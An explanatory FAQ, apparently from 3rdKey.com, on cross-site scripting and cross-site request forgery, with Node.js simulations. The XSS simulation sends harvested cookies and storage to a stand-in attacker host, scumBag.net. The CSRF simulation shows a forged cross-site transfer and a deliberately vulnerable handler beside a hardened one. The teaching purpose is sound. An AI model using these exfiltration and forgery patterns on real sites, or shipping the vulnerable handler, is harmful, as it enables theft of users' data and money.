What is a Cross-Site Scripting attack, and how does 3rdKey block it?

In short, Cross-Site Scripting (XSS) is a script that the site's owner did not write ending up running in a visitor's browser as part of that site's page, where it can read or manipulate anything the site's own scripts could.

A web site, TLC.org.za (a worthy orphanage in South Africa), wants to be better known, so it puts a chatter.com "like" button on its pages.

Dave, a true philanthropist, makes a donation using moneyFriend.com, then clicks the chatter "like" button to let his friends know about this worthy cause.

chatter.com's script, which now runs inside TLC.org.za's page, has Dave "like" and "follow" TLC.org.za, and then tells all of Dave's chatter friends about it.

Good for Dave, good for TLC.org.za, good for chatter.com; everybody's happy.

As long as chatter.com is highly moral and ethical and is never hacked. (Have any companies like chatter.com ever been breached? Here's a list of breaches at Facebook, and here's a list of breaches at Twitter.)

When the chatter.com script runs, it runs with the same rights as TLC.org.za's own scripts: it can read every TLC.org.za cookie that is not marked HttpOnly, all of TLC.org.za's web storage, and anything typed into or shown on the page.

So if chatter.com is not highly moral and ethical, or if it has been hacked, it can "steal" whatever Dave's moneyFriend.com connection left on the TLC.org.za page. (The script can only see what that page holds; it cannot read moneyFriend.com's own cookies, so the damage depends on what the donation flow put on the page.)

Suppose chatter.com was recently hacked by scumBag.net, and a malicious script was added to the "like" function. When Dave clicked "like", his moneyFriend.com details were sent to scumBag.net, and scumBag.net has just sent $1000 of Dave's hard-earned cash to a bank account in Mauritius.

The above scenario is purely fictitious, although things like that happen many times every day.

TLC.org.za is a real orphanage in South Africa that does wonderful things every day, with very little money.

But how does a site like 3rdKey.com prevent this kind of thing from happening?

Any site that understands this problem, including 3rdKey.com, configures its cookies so that scripts on the page cannot read them (the HttpOnly flag) and so that the browser sends them only to the site that set them. That protects the log-in cookie, but not web storage or the contents of the page, which any script that runs there can still read.

Additionally, we do not trust any other site: we will not put a script from any other site on any of our pages, ever. That is why you do not find the "like" button on our pages.
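The two halves of the story above, what a script from chatter.com can read once it runs inside TLC.org.za's page, and the two defences just described (HttpOnly cookies and refusing scripts from other sites), modelled in plain Node.js. This is an added example, not code from 3rdKey.com or from any site named on this page; the cookies, storage contents, script URLs and the scumBag.net beacon endpoint are all constructed for it, and the "no other site's script" rule is expressed here as the check a Content-Security-Policy of `script-src 'self'` would make, which is a standard browser mechanism the page itself does not mention.

```javascript
// Added example (not 3rdKey.com's code). Models what a third-party script sees
// inside a page, and the checks that limit it. All data below is constructed.

// Set-Cookie headers as TLC.org.za's server might send them (constructed).
// Only the first one carries HttpOnly.
const SERVER_SET_COOKIES = [
  "session=s3ss10n-t0k3n; Path=/; Secure; HttpOnly; SameSite=Lax",
  "donor_name=Dave; Path=/; Secure",
];

// Web storage the page keeps (constructed). No flag hides this from scripts.
const PAGE_LOCAL_STORAGE = { payoutAccount: "moneyFriend:dave@example.org" };

// Browsers leave HttpOnly cookies out of document.cookie; every other cookie is
// visible to every script on the page, whoever served that script.
function documentCookie(setCookieHeaders) {
  return setCookieHeaders
    .filter((header) => !/;\s*HttpOnly\s*(;|$)/i.test(header))
    .map((header) => header.split(";")[0].trim())
    .join("; ");
}

// What the chatter.com "like" script can collect when it runs on TLC.org.za.
function harvest(setCookieHeaders, storage) {
  return { cookies: documentCookie(setCookieHeaders), storage: { ...storage } };
}

// The exfiltration step of the hacked version of that script: the loot leaves as
// a URL the browser will fetch like any image, aimed at scumBag.net (constructed).
function exfilUrl(loot) {
  const encoded = Buffer.from(JSON.stringify(loot)).toString("base64");
  return `https://scumBag.net/collect?d=${encodeURIComponent(encoded)}`;
}

// Reverse of exfilUrl, used to confirm exactly what leaked.
function decodeExfil(url) {
  const encoded = new URL(url).searchParams.get("d"); // already percent-decoded
  return JSON.parse(Buffer.from(encoded, "base64").toString("utf8"));
}

// "No script from any other site", as the browser would enforce it under a
// Content-Security-Policy of script-src 'self': a script is allowed only when
// its resolved origin (scheme, host, port) equals the page's own origin.
function allowedBySelf(pageUrl, scriptSrc) {
  return new URL(scriptSrc, pageUrl).origin === new URL(pageUrl).origin;
}

// Returns the script sources on a page that the rule would refuse.
function auditScripts(pageUrl, scriptSrcs) {
  return scriptSrcs.filter((src) => !allowedBySelf(pageUrl, src));
}

// Stand-alone run: show what leaks and which scripts the rule would refuse.
const loot = harvest(SERVER_SET_COOKIES, PAGE_LOCAL_STORAGE);
console.log("visible to any script on the page:", loot);
console.log("beacon:", exfilUrl(loot));
console.log(
  "refused by script-src 'self':",
  auditScripts("https://tlc.org.za/donate", ["/js/site.js", "https://chatter.com/like.js"])
);
```

Note what the HttpOnly flag does and does not buy: the session cookie never appears in the harvest, but the donor's name and the web-storage entry do, which is why the second rule (no foreign scripts at all) matters as much as the cookie flags.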



Explain Cross-Site Request Forgery (CSRF), and how 3rdKey.com prevents it.

CSRF is often confused with Cross-Site Scripting: the effect is about the same, but the method is quite different.

In XSS, the scumBag.net script has stolen Dave's log-in by reading what goodSite.com's page holds. In CSRF, scumBag.net never sees the log-in at all: a page on scumBag.net that Dave visits makes his browser send a request to goodSite.com, the browser attaches Dave's goodSite.com cookies to it as it would to any request for that site, and scumBag.net "guesses" that Dave is logged in, so that goodSite.com carries out the instruction as if Dave had sent it himself.
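The forged request and the genuine one, as goodSite.com's server would see them, with a handler that accepts the forgery beside one that tells them apart. This is an added example, not code from 3rdKey.com or goodSite.com, and the page does not say which defence 3rdKey.com uses; the checks shown (the Origin and Sec-Fetch-Site request headers, and a per-session token that only goodSite.com's own form carries) are the standard ones. Sessions, cookies, headers and the transfer endpoint are all constructed for the example.

```javascript
// Added example (not 3rdKey.com's or goodSite.com's code). Models a CSRF attempt
// as the request objects a server sees, and two ways of handling it.

const SITE_ORIGIN = "https://goodSite.com"; // constructed, as on the page

// Server-side session store (constructed). The CSRF token is generated per
// session and embedded only in goodSite.com's own transfer form.
const SESSIONS = {
  "s3ss10n-t0k3n": { user: "dave", csrfToken: "f0rm-t0k3n-8d2c" },
};

// What Dave's browser sends when he submits the transfer form on goodSite.com.
const GENUINE_REQUEST = {
  method: "POST",
  path: "/transfer",
  headers: {
    cookie: "session=s3ss10n-t0k3n; theme=dark",
    origin: "https://goodSite.com",
    "sec-fetch-site": "same-origin",
  },
  body: { to: "dave-savings", amount: 50, csrfToken: "f0rm-t0k3n-8d2c" },
};

// What the same browser sends when a page on scumBag.net auto-submits a form to
// goodSite.com. scumBag.net only guesses Dave is logged in; the browser adds the
// goodSite.com cookie by itself, but the Origin header names the real sender and
// scumBag.net cannot know the session's token.
const FORGED_REQUEST = {
  method: "POST",
  path: "/transfer",
  headers: {
    cookie: "session=s3ss10n-t0k3n; theme=dark",
    origin: "https://scumBag.net",
    "sec-fetch-site": "cross-site",
  },
  body: { to: "mauritius-acct-7781", amount: 1000 },
};

// Pulls one cookie's value out of a Cookie header; undefined if absent.
function cookieValue(cookieHeader, name) {
  for (const pair of (cookieHeader || "").split(";")) {
    const [key, ...rest] = pair.trim().split("=");
    if (key === name) return rest.join("=");
  }
  return undefined;
}

// Vulnerable handler: "a valid session cookie arrived, so Dave must want this".
// This is exactly the assumption CSRF exploits.
function vulnerableTransfer(req) {
  const session = SESSIONS[cookieValue(req.headers.cookie, "session")];
  if (!session) return { status: 401, reason: "not logged in" };
  return { status: 200, reason: "transferred", user: session.user, to: req.body.to, amount: req.body.amount };
}

// Hardened handler: the cookie proves who the browser belongs to, not who
// composed the request, so the request must also prove it came from our page.
function hardenedTransfer(req) {
  const session = SESSIONS[cookieValue(req.headers.cookie, "session")];
  if (!session) return { status: 401, reason: "not logged in" };

  // Check 1: browsers send Origin / Sec-Fetch-Site on cross-site POSTs and the
  // sending page cannot alter them. Anything not from our own origin is refused.
  const { origin, "sec-fetch-site": fetchSite } = req.headers;
  if (origin !== undefined && origin !== SITE_ORIGIN) return { status: 403, reason: "cross-site origin" };
  if (fetchSite !== undefined && fetchSite !== "same-origin") return { status: 403, reason: "cross-site request" };

  // Check 2: the form must carry the token that only our own page was given.
  if (req.body.csrfToken !== session.csrfToken) return { status: 403, reason: "missing or wrong csrf token" };

  return { status: 200, reason: "transferred", user: session.user, to: req.body.to, amount: req.body.amount };
}

// Stand-alone run: the forgery succeeds against the first handler only.
console.log("vulnerable, genuine:", vulnerableTransfer(GENUINE_REQUEST));
console.log("vulnerable, forged: ", vulnerableTransfer(FORGED_REQUEST));
console.log("hardened,   genuine:", hardenedTransfer(GENUINE_REQUEST));
console.log("hardened,   forged: ", hardenedTransfer(FORGED_REQUEST));
```

The two checks are deliberately independent: the header check catches forgeries from modern browsers even when a form is missing its token, and the token check catches requests from clients that send no Origin header at all.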
